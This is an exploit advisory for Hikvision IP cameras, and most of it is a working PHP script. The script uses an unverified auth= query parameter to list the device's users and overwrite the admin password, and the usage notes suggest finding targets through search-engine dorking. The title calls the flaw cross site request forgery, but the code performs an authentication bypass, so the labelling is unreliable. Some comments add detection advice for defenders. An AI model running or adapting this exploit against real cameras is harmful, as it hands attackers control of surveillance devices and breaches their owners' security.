Hikvision IP Camera Cross Site Request Forgery
Hikvision IP Cameras suffer from a cross site request forgery vulnerability.
=============================================================================================================================================
| # Title : Hikvision IP Camera CSRF Add ADmin Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.2 (64 bits) |
| # Vendor : https://www.hikvision.com/ |
=============================================================================================================================================

POC :

[+] Dorking İn Google Or Other Search Enggine.
[+] The vulnerability has been present in Hikvision products since 2014.
[+] add new admin.
[+] Line 104 set your target .
[+] save code as poc.php .
[+] USage : cmd => c:\www\test\php poc.php

[+] PayLoad :

<?php

/**
 * Proof-of-concept client for the Hikvision user endpoint described in the advisory above.
 *
 * Every request this class sends goes to /Security/users on the camera's HTTP port and carries
 * its credentials in an `auth=` query-string parameter (base64 of "admin:<random>") instead of
 * an Authorization header. From a defender's side that parameter is the reliable observable:
 * log or block requests to the camera management interface whose query string contains `auth=`,
 * and alert on PUT requests to /Security/users in particular, since that is the password-change
 * step. The advisory dates the issue to 2014; the fix is vendor firmware, and the camera's HTTP
 * interface should not be reachable from untrusted networks in the first place.
 *
 * Note on wording: despite "add new admin" in the advisory, the code below does not create an
 * account — exploit() PUTs a <User> record for an existing user id (default 1, "admin") and
 * overwrites its password.
 */
class HikvisionExploit {
    // Host name or IP address of the camera; used verbatim in the URL, never validated.
    private $target;
    // TCP port of the camera's HTTP interface (default 80).
    private $port;
    // Name written into the <userName> element of the PUT body (default 'admin').
    private $username;
    // Password written into the <password> element of the PUT body.
    private $password;
    // Numeric user id written into the <id> element of the PUT body (default 1).
    private $id;
    // When true, reportCreds() is called after a successful PUT (it only echoes; see below).
    private $storeCred;

    /**
     * Stores the connection and payload parameters as given; no validation is performed.
     *
     * @param string $target    camera host or IP
     * @param int    $port      HTTP port
     * @param string $username  user name placed in the PUT body
     * @param string $password  new password placed in the PUT body
     * @param int    $id        user id placed in the PUT body
     * @param bool   $storeCred whether to call reportCreds() on success
     */
    public function __construct($target, $port = 80, $username = 'admin', $password = 'Pa$$W0rd', $id = 1, $storeCred = true) {
        $this->target = $target;
        $this->port = $port;
        $this->username = $username;
        $this->password = $password;
        $this->id = $id;
        $this->storeCred = $storeCred;
    }

    /**
     * Probes whether the device honours the `auth=` query parameter.
     *
     * Sends a GET to /Security/users with "admin:<random 10 chars>" as the auth value. Because
     * the password half is random, an HTTP 200 here means the device answered without checking
     * the credential — and in that case the response body already discloses the device's user
     * table (userName / id / userLevel), which this method prints.
     *
     * @return string 'Vulnerable' on HTTP 200, 'Safe' on any other status code. The
     *                'No response received' branch is unreachable: sendRequest() always returns
     *                a non-empty array, so a connection failure arrives as a non-200 http_code
     *                (typically 0) and is reported as 'Safe'.
     */
    public function check() {
        // Random password on purpose: the probe succeeds only if the device ignores it.
        $auth = base64_encode("admin:" . $this->generateRandomPassword());
        $url = "http://{$this->target}:{$this->port}/Security/users?auth=" . urlencode($auth);
        $response = $this->sendRequest('GET', $url);
        if (!$response) {
            return 'No response received from the target!';
        }
        // Loose comparison against the int returned by CURLINFO_HTTP_CODE.
        if ($response['http_code'] == 200) {
            echo "Following users are available for password reset...\n";
            // Body is expected to be the device's XML user list; no check that parsing succeeded.
            $xml = simplexml_load_string($response['body']);
            foreach ($xml->User as $user) {
                echo "USERNAME: " . $user->userName . " | ID: " . $user->id . " | ROLE: " . $user->userLevel . "\n";
            }
            return 'Vulnerable';
        } else {
            return 'Safe';
        }
    }

    /**
     * Runs check() and, only if it returned 'Vulnerable', PUTs a <User> record that sets the
     * password of user $id to $password.
     *
     * The PUT reuses the same `auth=` query-string credential as check(), with the XML body
     * sent as application/xml. This is the request a WAF or IDS rule should key on: a PUT to
     * /Security/users carrying `auth=` in the query string.
     *
     * @return bool|null false if check() did not return 'Vulnerable'; otherwise null (there is
     *                   no return after the PUT, whether it yielded 200 or not). As in check(),
     *                   the "did not respond" branch cannot be reached because sendRequest()
     *                   always returns an array.
     */
    public function exploit() {
        if ($this->check() !== 'Vulnerable') {
            return false;
        }
        echo "Starting the password reset for {$this->username}...\n";
        // Single <User> record in the vendor's XML namespace: id, userName and the new password.
        $postData = "<User version=\"1.0\" xmlns=\"http://www.hikvision.com/ver10/XMLSchema\">\r\n" . "<id>{$this->id}</id>\r\n" . "<userName>{$this->username}</userName>\r\n" . "<password>{$this->password}</password>\r\n</User>";
        $auth = base64_encode("admin:" . $this->generateRandomPassword());
        $url = "http://{$this->target}:{$this->port}/Security/users?auth=" . urlencode($auth);
        $response = $this->sendRequest('PUT', $url, $postData, 'application/xml');
        if (!$response) {
            echo "Target server did not respond to the password reset request\n";
            return false;
        }
        if ($response['http_code'] == 200) {
            echo "Password reset for {$this->username} was successfully completed!\n";
            echo "Please log in with your new password: {$this->password}\n";
            if ($this->storeCred) {
                $this->reportCreds();
            }
        } else {
            echo "Unknown Error. Password reset was not successful!\n";
        }
    }

    /**
     * Minimal curl wrapper used by check() and exploit().
     *
     * Plain HTTP only; no timeout or TLS options are configured. The request body is sent via
     * CURLOPT_POSTFIELDS regardless of $method (the verb comes from CURLOPT_CUSTOMREQUEST), and a
     * Content-Type header is added only when $contentType is given.
     *
     * @param string      $method      HTTP verb ('GET' or 'PUT' here)
     * @param string      $url         full URL including the `auth=` query parameter
     * @param string|null $data        request body, or null for none
     * @param string|null $contentType value for the Content-Type header, or null for none
     * @return array{http_code: int, body: string|false} always an array; 'body' is false when
     *                                                   curl_exec() fails
     */
    private function sendRequest($method, $url, $data = null, $contentType = null) {
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
        curl_setopt($ch, CURLOPT_CUSTOMREQUEST, $method);
        if ($data) {
            curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
        }
        if ($contentType) {
            curl_setopt($ch, CURLOPT_HTTPHEADER, ["Content-Type: $contentType"]);
        }
        $response = curl_exec($ch);
        $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
        curl_close($ch);
        return ['http_code' => $http_code, 'body' => $response];
    }

    /**
     * Returns $length alphanumeric characters from a shuffled alphabet.
     *
     * str_shuffle() is not a cryptographic source, but that does not matter here: the value is
     * only a throwaway placeholder in the `auth=` credential, which, per check(), the affected
     * device appears not to verify at all.
     *
     * @param int $length number of characters to return (default 10)
     * @return string
     */
    private function generateRandomPassword($length = 10) {
        return substr(str_shuffle('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789'), 0, $length);
    }

    /**
     * Placeholder called when $storeCred is true; it only prints a message. Nothing is persisted.
     */
    private function reportCreds() {
        // In a real implementation, you could store the credentials into a database
        echo "Credentials for {$this->username} were added to the database...\n";
    }
}

// Example usage
// 'target-ip' is a placeholder host from the advisory. exploit() calls check() first and does
// nothing further unless that probe returned 'Vulnerable'.
$exploit = new HikvisionExploit('target-ip');
$exploit->exploit();

Greetings to :
=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)
|===================================================================================================